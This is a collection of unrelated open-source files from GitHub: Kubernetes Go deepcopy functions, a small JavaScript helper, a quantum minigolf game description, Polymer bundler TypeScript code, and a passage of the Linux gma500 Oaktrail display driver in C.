// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *NonResourceRule) DeepCopyInto(out *NonResourceRule) {
*out = *in
if in.Verbs != nil {
in, out := &in.Verbs, &out.Verbs
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.NonResourceURLs != nil {
in, out := &in.NonResourceURLs, &out.NonResourceURLs
*out = make([]string, len(*in))
copy(*out, *in)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new NonResourceRule.
func (in *NonResourceRule) DeepCopy() *NonResourceRule {
if in == nil {
return nil
}
out := new(NonResourceRule)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *ResourceAttributes) DeepCopyInto(out *ResourceAttributes) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceAttributes.
func (in *ResourceAttributes) DeepCopy() *ResourceAttributes {
if in == nil {
return nil
}
out := new(ResourceAttributes)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *ResourceRule) DeepCopyInto(out *ResourceRule) {
*out = *in
if in.Verbs != nil {
in, out := &in.Verbs, &out.Verbs
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.APIGroups != nil {
in, out := &in.APIGroups, &out.APIGroups
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.Resources != nil {
in, out := &in.Resources, &out.Resources
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.ResourceNames != nil {
in, out := &in.ResourceNames, &out.ResourceNames
*out = make([]string, len(*in))
copy(*out, *in)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceRule.
func (in *ResourceRule) DeepCopy() *ResourceRule {
if in == nil {
return nil
}
out := new(ResourceRule)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectAccessReview) DeepCopyInto(out *SelfSubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectAccessReview.
func (in *SelfSubjectAccessReview) DeepCopy() *SelfSubjectAccessReview {
if in == nil {
return nil
}
out := new(SelfSubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *SelfSubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectAccessReviewSpec) DeepCopyInto(out *SelfSubjectAccessReviewSpec) {
*out = *in
if in.ResourceAttributes != nil {
in, out := &in.ResourceAttributes, &out.ResourceAttributes
*out = new(ResourceAttributes)
**out = **in
}
if in.NonResourceAttributes != nil {
in, out := &in.NonResourceAttributes, &out.NonResourceAttributes
*out = new(NonResourceAttributes)
**out = **in
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectAccessReviewSpec.
func (in *SelfSubjectAccessReviewSpec) DeepCopy() *SelfSubjectAccessReviewSpec {
if in == nil {
return nil
}
out := new(SelfSubjectAccessReviewSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectRulesReview) DeepCopyInto(out *SelfSubjectRulesReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
out.Spec = in.Spec
in.Status.DeepCopyInto(&out.Status)
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectRulesReview.
func (in *SelfSubjectRulesReview) DeepCopy() *SelfSubjectRulesReview {
if in == nil {
return nil
}
out := new(SelfSubjectRulesReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *SelfSubjectRulesReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectRulesReviewSpec) DeepCopyInto(out *SelfSubjectRulesReviewSpec) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectRulesReviewSpec.
func (in *SelfSubjectRulesReviewSpec) DeepCopy() *SelfSubjectRulesReviewSpec {
if in == nil {
return nil
}
out := new(SelfSubjectRulesReviewSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SubjectAccessReview) DeepCopyInto(out *SubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SubjectAccessReview.
func (in *SubjectAccessReview) DeepCopy() *SubjectAccessReview {
if in == nil {
return nil
}
out := new(SubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *SubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SubjectAccessReviewSpec) DeepCopyInto(out *SubjectAccessReviewSpec) {
*out = *in
if in.ResourceAttributes != nil {
in, out := &in.ResourceAttributes, &out.ResourceAttributes
*out = new(ResourceAttributes)
**out = **in
}
if in.NonResourceAttributes != nil {
in, out := &in.NonResourceAttributes, &out.NonResourceAttributes
*out = new(NonResourceAttributes)
**out = **in
}
if in.Groups != nil {
in, out := &in.Groups, &out.Groups
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.Extra != nil {
in, out := &in.Extra, &out.Extra
*out = make(map[string]ExtraValue, len(*in))
for key, val := range *in {
var outVal []string
if val == nil {
(*out)[key] = nil
} else {
in, out := &val, &outVal
*out = make(ExtraValue, len(*in))
copy(*out, *in)
}
(*out)[key] = outVal
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SubjectAccessReviewSpec.
func (in *SubjectAccessReviewSpec) DeepCopy() *SubjectAccessReviewSpec {
if in == nil {
return nil
}
out := new(SubjectAccessReviewSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SubjectAccessReviewStatus) DeepCopyInto(out *SubjectAccessReviewStatus) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SubjectAccessReviewStatus.
func (in *SubjectAccessReviewStatus) DeepCopy() *SubjectAccessReviewStatus {
if in == nil {
return nil
}
out := new(SubjectAccessReviewStatus)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SubjectRulesReviewStatus) DeepCopyInto(out *SubjectRulesReviewStatus) {
*out = *in
if in.ResourceRules != nil {
in, out := &in.ResourceRules, &out.ResourceRules
*out = make([]ResourceRule, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
if in.NonResourceRules != nil {
in, out := &in.NonResourceRules, &out.NonResourceRules
*out = make([]NonResourceRule, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SubjectRulesReviewStatus.
func (in *SubjectRulesReviewStatus) DeepCopy() *SubjectRulesReviewStatus {
if in == nil {
return nil
}
out := new(SubjectRulesReviewStatus)
in.DeepCopyInto(out)
return out
}
| {
"pile_set_name": "Github"
} |
/**
* Gets the value at `key` of `object`.
*
* @private
* @param {Object} [object] The object to query.
* @param {string} key The key of the property to get.
* @returns {*} Returns the property value.
*/
function getValue(object, key) {
return object == null ? undefined : object[key];
}
export default getValue;
| {
"pile_set_name": "Github"
} |
The game quantum minigolf is nearly the same as the game minigolf
- except that the ball obeys the laws of quantum mechanics.
Such a ball can be at several places at once. It can diffract around
obstacles and interfere with itself. Apart from that, the rules are
the same: You can play on various tracks involving various obstacles.
You hit the ball with a club and try to kick it into a hole on the
other side of the track.
WWW: http://quantumminigolf.sourceforge.net
| {
"pile_set_name": "Github"
} |
/**
* @license
* Copyright (c) 2018 The Polymer Project Authors. All rights reserved.
* This code may only be used under the BSD style license found at
* http://polymer.github.io/LICENSE.txt
* The complete set of authors may be found at
* http://polymer.github.io/AUTHORS.txt
* The complete set of contributors may be found at
* http://polymer.github.io/CONTRIBUTORS.txt
* Code distributed by Google as part of the polymer project is also
* subject to an additional IP rights grant found at
* http://polymer.github.io/PATENTS.txt
*/
import generate from 'babel-generator';
import * as babel from 'babel-types';
import {ResolvedUrl} from 'polymer-analyzer';
import {assertIsJsDocument, getAnalysisDocument} from './analyzer-utils';
import {AssignedBundle, BundleManifest} from './bundle-manifest';
import {Bundler} from './bundler';
import {BundledJsDocument} from './document-collection';
import {getModuleExportNames, getOrSetBundleModuleExportName} from './es6-module-utils';
import {Es6Rewriter} from './es6-rewriter';
import {ensureLeadingDot, stripUrlFileSearchAndHash} from './url-utils';
/**
* Produces an ES6 Module BundledDocument.
*/
export async function bundle(
bundler: Bundler, manifest: BundleManifest, url: ResolvedUrl):
Promise<BundledJsDocument> {
const bundle = manifest.bundles.get(url);
if (!bundle) {
throw new Error(`No bundle found in manifest for url ${url}.`);
}
const assignedBundle = {url, bundle};
const generatedCode =
await prepareBundleModule(bundler, manifest, assignedBundle);
const es6Rewriter = new Es6Rewriter(bundler, manifest, assignedBundle);
const {code: rolledUpCode} = await es6Rewriter.rollup(url, generatedCode);
const document = assertIsJsDocument(
await bundler.analyzeContents(assignedBundle.url, rolledUpCode));
return {
language: 'js',
ast: document.parsedDocument.ast,
content: document.parsedDocument.contents,
files: [...assignedBundle.bundle.files]
};
}
/**
* Generate code containing import statements to all bundled modules and
* export statements to re-export their namespaces and exports.
*
* Example: a bundle containing files `module-a.js` and `module-b.js` would
* result in a prepareBundleModule result like:
*
* import * as $moduleA from './module-a.js';
* import * as $moduleB from './module-b.js';
* import $moduleBDefault from './module-b.js';
* export {thing1, thing2} from './module-a.js';
* export {thing3} from './module-b.js';
* export {$moduleA, $moduleB, $moduleBDefault};
*/
async function prepareBundleModule(
bundler: Bundler, manifest: BundleManifest, assignedBundle: AssignedBundle):
Promise<string> {
const bundleSource = babel.program([]);
const sourceAnalysis =
await bundler.analyzer.analyze([...assignedBundle.bundle.files]);
for (const resolvedSourceUrl of [...assignedBundle.bundle.files].sort()) {
const moduleDocument =
getAnalysisDocument(sourceAnalysis, resolvedSourceUrl);
const moduleExports = getModuleExportNames(moduleDocument);
const starExportName =
getOrSetBundleModuleExportName(assignedBundle, resolvedSourceUrl, '*');
bundleSource.body.push(babel.importDeclaration(
[babel.importNamespaceSpecifier(babel.identifier(starExportName))],
babel.stringLiteral(resolvedSourceUrl)));
if (moduleExports.size > 0) {
bundleSource.body.push(babel.exportNamedDeclaration(
undefined, [babel.exportSpecifier(
babel.identifier(starExportName),
babel.identifier(starExportName))]));
bundleSource.body.push(babel.exportNamedDeclaration(
undefined,
[...moduleExports].map(
(e) => babel.exportSpecifier(
babel.identifier(e),
babel.identifier(getOrSetBundleModuleExportName(
assignedBundle, resolvedSourceUrl, e)))),
babel.stringLiteral(resolvedSourceUrl)));
}
}
const {code} = generate(bundleSource);
return code;
}
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0-only
/*
* Copyright © 2009 Intel Corporation
*/
#include <linux/delay.h>
#include <linux/i2c.h>
#include <linux/pm_runtime.h>
#include <drm/drm_fourcc.h>
#include "framebuffer.h"
#include "gma_display.h"
#include "power.h"
#include "psb_drv.h"
#include "psb_intel_drv.h"
#include "psb_intel_reg.h"
#define MRST_LIMIT_LVDS_100L 0
#define MRST_LIMIT_LVDS_83 1
#define MRST_LIMIT_LVDS_100 2
#define MRST_LIMIT_SDVO 3
#define MRST_DOT_MIN 19750
#define MRST_DOT_MAX 120000
#define MRST_M_MIN_100L 20
#define MRST_M_MIN_100 10
#define MRST_M_MIN_83 12
#define MRST_M_MAX_100L 34
#define MRST_M_MAX_100 17
#define MRST_M_MAX_83 20
#define MRST_P1_MIN 2
#define MRST_P1_MAX_0 7
#define MRST_P1_MAX_1 8
static bool mrst_lvds_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock);
static bool mrst_sdvo_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock);
static const struct gma_limit_t mrst_limits[] = {
{ /* MRST_LIMIT_LVDS_100L */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_100L, .max = MRST_M_MAX_100L},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_1},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_LVDS_83L */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_83, .max = MRST_M_MAX_83},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_0},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_LVDS_100 */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_100, .max = MRST_M_MAX_100},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_1},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_SDVO */
.vco = {.min = 1400000, .max = 2800000},
.n = {.min = 3, .max = 7},
.m = {.min = 80, .max = 137},
.p1 = {.min = 1, .max = 2},
.p2 = {.dot_limit = 200000, .p2_slow = 10, .p2_fast = 10},
.find_pll = mrst_sdvo_find_best_pll,
},
};
#define MRST_M_MIN 10
static const u32 oaktrail_m_converts[] = {
0x2B, 0x15, 0x2A, 0x35, 0x1A, 0x0D, 0x26, 0x33, 0x19, 0x2C,
0x36, 0x3B, 0x1D, 0x2E, 0x37, 0x1B, 0x2D, 0x16, 0x0B, 0x25,
0x12, 0x09, 0x24, 0x32, 0x39, 0x1c,
};
static const struct gma_limit_t *mrst_limit(struct drm_crtc *crtc,
int refclk)
{
const struct gma_limit_t *limit = NULL;
struct drm_device *dev = crtc->dev;
struct drm_psb_private *dev_priv = dev->dev_private;
if (gma_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)
|| gma_pipe_has_type(crtc, INTEL_OUTPUT_MIPI)) {
switch (dev_priv->core_freq) {
case 100:
limit = &mrst_limits[MRST_LIMIT_LVDS_100L];
break;
case 166:
limit = &mrst_limits[MRST_LIMIT_LVDS_83];
break;
case 200:
limit = &mrst_limits[MRST_LIMIT_LVDS_100];
break;
}
} else if (gma_pipe_has_type(crtc, INTEL_OUTPUT_SDVO)) {
limit = &mrst_limits[MRST_LIMIT_SDVO];
} else {
limit = NULL;
dev_err(dev->dev, "mrst_limit Wrong display type.\n");
}
return limit;
}
/** Derive the pixel clock for the given refclk and divisors for 8xx chips. */
static void mrst_lvds_clock(int refclk, struct gma_clock_t *clock)
{
clock->dot = (refclk * clock->m) / (14 * clock->p1);
}
static void mrst_print_pll(struct gma_clock_t *clock)
{
DRM_DEBUG_DRIVER("dotclock=%d, m=%d, m1=%d, m2=%d, n=%d, p1=%d, p2=%d\n",
clock->dot, clock->m, clock->m1, clock->m2, clock->n,
clock->p1, clock->p2);
}
static bool mrst_sdvo_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock)
{
struct gma_clock_t clock;
u32 target_vco, actual_freq;
s32 freq_error, min_error = 100000;
memset(best_clock, 0, sizeof(*best_clock));
memset(&clock, 0, sizeof(clock));
for (clock.m = limit->m.min; clock.m <= limit->m.max; clock.m++) {
for (clock.n = limit->n.min; clock.n <= limit->n.max;
clock.n++) {
for (clock.p1 = limit->p1.min;
clock.p1 <= limit->p1.max; clock.p1++) {
/* p2 value always stored in p2_slow on SDVO */
clock.p = clock.p1 * limit->p2.p2_slow;
target_vco = target * clock.p;
/* VCO will increase at this point so break */
if (target_vco > limit->vco.max)
break;
if (target_vco < limit->vco.min)
continue;
actual_freq = (refclk * clock.m) /
(clock.n * clock.p);
freq_error = 10000 -
((target * 10000) / actual_freq);
if (freq_error < -min_error) {
/* freq_error will start to decrease at
this point so break */
break;
}
if (freq_error < 0)
freq_error = -freq_error;
if (freq_error < min_error) {
min_error = freq_error;
*best_clock = clock;
}
}
}
if (min_error == 0)
break;
}
return min_error == 0;
}
/**
* Returns a set of divisors for the desired target clock with the given refclk,
* or FALSE. Divisor values are the actual divisors for
*/
static bool mrst_lvds_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock)
{
struct gma_clock_t clock;
int err = target;
memset(best_clock, 0, sizeof(*best_clock));
memset(&clock, 0, sizeof(clock));
for (clock.m = limit->m.min; clock.m <= limit->m.max; clock.m++) {
for (clock.p1 = limit->p1.min; clock.p1 <= limit->p1.max;
clock.p1++) {
int this_err;
mrst_lvds_clock(refclk, &clock);
this_err = abs(clock.dot - target);
if (this_err < err) {
*best_clock = clock;
err = this_err;
}
}
}
return err != target;
}
/**
* Sets the power management mode of the pipe and plane.
*
* This code should probably grow support for turning the cursor off and back
* on appropriately at the same time as we're turning the pipe off/on.
*/
static void oaktrail_crtc_dpms(struct drm_crtc *crtc, int mode)
{
struct drm_device *dev = crtc->dev;
struct drm_psb_private *dev_priv = dev->dev_private;
struct gma_crtc *gma_crtc = to_gma_crtc(crtc);
int pipe = gma_crtc->pipe;
const struct psb_offset *map = &dev_priv->regmap[pipe];
u32 temp;
int i;
int need_aux = gma_pipe_has_type(crtc, INTEL_OUTPUT_SDVO) ? 1 : 0;
if (gma_pipe_has_type(crtc, INTEL_OUTPUT_HDMI)) {
oaktrail_crtc_hdmi_dpms(crtc, mode);
return;
}
if (!gma_power_begin(dev, true))
return;
/* XXX: When our outputs are all unaware of DPMS modes other than off
* and on, we should map those modes to DRM_MODE_DPMS_OFF in the CRTC.
*/
switch (mode) {
case DRM_MODE_DPMS_ON:
case DRM_MODE_DPMS_STANDBY:
case DRM_MODE_DPMS_SUSPEND:
for (i = 0; i <= need_aux; i++) {
/* Enable the DPLL */
temp = REG_READ_WITH_AUX(map->dpll, i);
if ((temp & DPLL_VCO_ENABLE) == 0) {
REG_WRITE_WITH_AUX(map->dpll, temp, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
REG_WRITE_WITH_AUX(map->dpll,
temp | DPLL_VCO_ENABLE, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
REG_WRITE_WITH_AUX(map->dpll,
temp | DPLL_VCO_ENABLE, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
}
/* Enable the pipe */
temp = REG_READ_WITH_AUX(map->conf, i);
if ((temp & PIPEACONF_ENABLE) == 0) {
REG_WRITE_WITH_AUX(map->conf,
temp | PIPEACONF_ENABLE, i);
}
/* Enable the plane */
temp = REG_READ_WITH_AUX(map->cntr, i);
if ((temp & DISPLAY_PLANE_ENABLE) == 0) {
REG_WRITE_WITH_AUX(map->cntr,
temp | DISPLAY_PLANE_ENABLE,
i);
/* Flush the plane changes */
REG_WRITE_WITH_AUX(map->base,
REG_READ_WITH_AUX(map->base, i), i);
}
}
gma_crtc_load_lut(crtc);
/* Give the overlay scaler a chance to enable
if it's on this pipe */
/* psb_intel_crtc_dpms_video(crtc, true); TODO */
break;
case DRM_MODE_DPMS_OFF:
/* Give the overlay scaler a chance to disable
* if it's on this pipe */
/* psb_intel_crtc_dpms_video(crtc, FALSE); TODO */
for (i = 0; i <= need_aux; i++) {
/* Disable the VGA plane that we never use */
REG_WRITE_WITH_AUX(VGACNTRL, VGA_DISP_DISABLE, i);
/* Disable display plane */
temp = REG_READ_WITH_AUX(map->cntr, i);
if ((temp & DISPLAY_PLANE_ENABLE) != 0) {
REG_WRITE_WITH_AUX(map->cntr,
temp & ~DISPLAY_PLANE_ENABLE, i);
/* Flush the plane changes */
REG_WRITE_WITH_AUX(map->base,
REG_READ(map->base), i);
REG_READ_WITH_AUX(map->base, i);
}
/* Next, disable display pipes */
temp = REG_READ_WITH_AUX(map->conf, i);
if ((temp & PIPEACONF_ENABLE) != 0) {
REG_WRITE_WITH_AUX(map->conf,
temp & ~PIPEACONF_ENABLE, i);
REG_READ_WITH_AUX(map->conf, i);
}
/* Wait for for the pipe disable to take effect. */
gma_wait_for_vblank(dev);
temp = REG_READ_WITH_AUX(map->dpll, i);
if ((temp & DPLL_VCO_ENABLE) != 0) {
REG_WRITE_WITH_AUX(map->dpll,
temp & ~DPLL_VCO_ENABLE, i);
REG_READ_WITH_AUX(map->dpll, i);
}
/* Wait for the clocks to turn off. */
udelay(150);
}
break;
}
/* Set FIFO Watermarks (values taken from EMGD) */
REG_WRITE(DSPARB, 0x3f80);
REG_WRITE(DSPFW1, 0x3f8f0404);
REG_WRITE(DSPFW2, 0x04040f04);
REG_WRITE(DSPFW3, 0x0);
REG_WRITE(DSPFW4, 0x04040404);
REG_WRITE(DSPFW5, 0x04040404);
REG_WRITE(DSPFW6, 0x78);
REG_WRITE(DSPCHICKENBIT, REG_READ(DSPCHICKENBIT) | 0xc040);
gma_power_end(dev);
}
/**
* Return the pipe currently connected to the panel fitter,
* or -1 if the panel fitter is not present or not in use
*/
static int oaktrail_panel_fitter_pipe(struct drm_device *dev)
{
u32 pfit_control;
pfit_control = REG_READ(PFIT_CONTROL);
/* See if the panel fitter is in use */
if ((pfit_control & PFIT_ENABLE) == 0)
return -1;
return (pfit_control >> 29) & 3;
}
static int oaktrail_crtc_mode_set(struct drm_crtc *crtc,
struct drm_display_mode *mode,
struct drm_display_mode *adjusted_mode,
int x, int y,
struct drm_framebuffer *old_fb)
{
struct drm_device *dev = crtc->dev;
struct gma_crtc *gma_crtc = to_gma_crtc(crtc);
struct drm_psb_private *dev_priv = dev->dev_private;
int pipe = gma_crtc->pipe;
const struct psb_offset *map = &dev_priv->regmap[pipe];
int refclk = 0;
struct gma_clock_t clock;
const struct gma_limit_t *limit;
u32 dpll = 0, fp = 0, dspcntr, pipeconf;
bool ok, is_sdvo = false;
bool is_lvds = false;
bool is_mipi = false;
struct drm_mode_config *mode_config = &dev->mode_config;
struct gma_encoder *gma_encoder = NULL;
uint64_t scalingType = DRM_MODE_SCALE_FULLSCREEN;
struct drm_connector *connector;
int i;
int need_aux = gma_pipe_has_type(crtc, INTEL_OUTPUT_SDVO) ? 1 : 0;
if (gma_pipe_has_type(crtc, INTEL_OUTPUT_HDMI))
return oaktrail_crtc_hdmi_mode_set(crtc, mode, adjusted_mode, x, y, old_fb);
if (!gma_power_begin(dev, true))
return 0;
memcpy(&gma_crtc->saved_mode,
mode,
sizeof(struct drm_display_mode));
memcpy(&gma_crtc->saved_adjusted_mode,
adjusted_mode,
sizeof(struct drm_display_mode));
list_for_each_entry(connector, &mode_config->connector_list, head) {
if (!connector->encoder || connector->encoder->crtc != crtc)
continue;
gma_encoder = gma_attached_encoder(connector);
switch (gma_encoder->type) {
case INTEL_OUTPUT_LVDS:
is_lvds = true;
break;
case INTEL_OUTPUT_SDVO:
is_sdvo = true;
break;
case INTEL_OUTPUT_MIPI:
is_mipi = true;
break;
}
}
/* Disable the VGA plane that we never use */
for (i = 0; i <= need_aux; i++)
REG_WRITE_WITH_AUX(VGACNTRL, VGA_DISP_DISABLE, i);
/* Disable the panel fitter if it was on our pipe */
if (oaktrail_panel_fitter_pipe(dev) == pipe)
REG_WRITE(PFIT_CONTROL, 0);
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->src, ((mode->crtc_hdisplay - 1) << 16) |
(mode->crtc_vdisplay - 1), i);
}
if (gma_encoder)
drm_object_property_get_value(&connector->base,
dev->mode_config.scaling_mode_property, &scalingType);
if (scalingType == DRM_MODE_SCALE_NO_SCALE) {
/* Moorestown doesn't have register support for centering so
* we need to mess with the h/vblank and h/vsync start and
* ends to get centering */
int offsetX = 0, offsetY = 0;
offsetX = (adjusted_mode->crtc_hdisplay -
mode->crtc_hdisplay) / 2;
offsetY = (adjusted_mode->crtc_vdisplay -
mode->crtc_vdisplay) / 2;
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->htotal, (mode->crtc_hdisplay - 1) |
((adjusted_mode->crtc_htotal - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vtotal, (mode->crtc_vdisplay - 1) |
((adjusted_mode->crtc_vtotal - 1) << 16), i);
REG_WRITE_WITH_AUX(map->hblank,
(adjusted_mode->crtc_hblank_start - offsetX - 1) |
((adjusted_mode->crtc_hblank_end - offsetX - 1) << 16), i);
REG_WRITE_WITH_AUX(map->hsync,
(adjusted_mode->crtc_hsync_start - offsetX - 1) |
((adjusted_mode->crtc_hsync_end - offsetX - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vblank,
(adjusted_mode->crtc_vblank_start - offsetY - 1) |
((adjusted_mode->crtc_vblank_end - offsetY - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vsync,
(adjusted_mode->crtc_vsync_start - offsetY - 1) |
((adjusted_mode->crtc_vsync_end - offsetY - 1) << 16), i);
}
} else {
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->htotal, (adjusted_mode->crtc_hdisplay - 1) |
((adjusted_mode->crtc_htotal - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vtotal, (adjusted_mode->crtc_vdisplay - 1) |
((adjusted_mode->crtc_vtotal - 1) << 16), i);
REG_WRITE_WITH_AUX(map->hblank, (adjusted_mode->crtc_hblank_start - 1) |
((adjusted_mode->crtc_hblank_end - 1) << 16), i);
REG_WRITE_WITH_AUX(map->hsync, (adjusted_mode->crtc_hsync_start - 1) |
((adjusted_mode->crtc_hsync_end - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vblank, (adjusted_mode->crtc_vblank_start - 1) |
((adjusted_mode->crtc_vblank_end - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vsync, (adjusted_mode->crtc_vsync_start - 1) |
((adjusted_mode->crtc_vsync_end - 1) << 16), i);
}
}
/* Flush the plane changes */
{
const struct drm_crtc_helper_funcs *crtc_funcs =
crtc->helper_private;
crtc_funcs->mode_set_base(crtc, x, y, old_fb);
}
/* setup pipeconf */
pipeconf = REG_READ(map->conf);
/* Set up the display plane register */
dspcntr = REG_READ(map->cntr);
dspcntr |= DISPPLANE_GAMMA_ENABLE;
if (pipe == 0)
dspcntr |= DISPPLANE_SEL_PIPE_A;
else
dspcntr |= DISPPLANE_SEL_PIPE_B;
if (is_mipi)
goto oaktrail_crtc_mode_set_exit;
dpll = 0; /*BIT16 = 0 for 100MHz reference */
refclk = is_sdvo ? 96000 : dev_priv->core_freq * 1000;
limit = mrst_limit(crtc, refclk);
ok = limit->find_pll(limit, crtc, adjusted_mode->clock,
refclk, &clock);
if (is_sdvo) {
/* Convert calculated values to register values */
clock.p1 = (1L << (clock.p1 - 1));
clock.m -= 2;
clock.n = (1L << (clock.n - 1));
}
if (!ok)
DRM_ERROR("Failed to find proper PLL settings");
mrst_print_pll(&clock);
if (is_sdvo)
fp = clock.n << 16 | clock.m;
else
fp = oaktrail_m_converts[(clock.m - MRST_M_MIN)] << 8;
dpll |= DPLL_VGA_MODE_DIS;
dpll |= DPLL_VCO_ENABLE;
if (is_lvds)
dpll |= DPLLA_MODE_LVDS;
else
dpll |= DPLLB_MODE_DAC_SERIAL;
if (is_sdvo) {
int sdvo_pixel_multiply =
adjusted_mode->clock / mode->clock;
dpll |= DPLL_DVO_HIGH_SPEED;
dpll |=
(sdvo_pixel_multiply -
1) << SDVO_MULTIPLIER_SHIFT_HIRES;
}
/* compute bitmask from p1 value */
if (is_sdvo)
dpll |= clock.p1 << 16; // dpll |= (1 << (clock.p1 - 1)) << 16;
else
dpll |= (1 << (clock.p1 - 2)) << 17;
dpll |= DPLL_VCO_ENABLE;
if (dpll & DPLL_VCO_ENABLE) {
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->fp0, fp, i);
REG_WRITE_WITH_AUX(map->dpll, dpll & ~DPLL_VCO_ENABLE, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Check the DPLLA lock bit PIPEACONF[29] */
udelay(150);
}
}
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->fp0, fp, i);
REG_WRITE_WITH_AUX(map->dpll, dpll, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
/* write it again -- the BIOS does, after all */
REG_WRITE_WITH_AUX(map->dpll, dpll, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
REG_WRITE_WITH_AUX(map->conf, pipeconf, i);
REG_READ_WITH_AUX(map->conf, i);
gma_wait_for_vblank(dev);
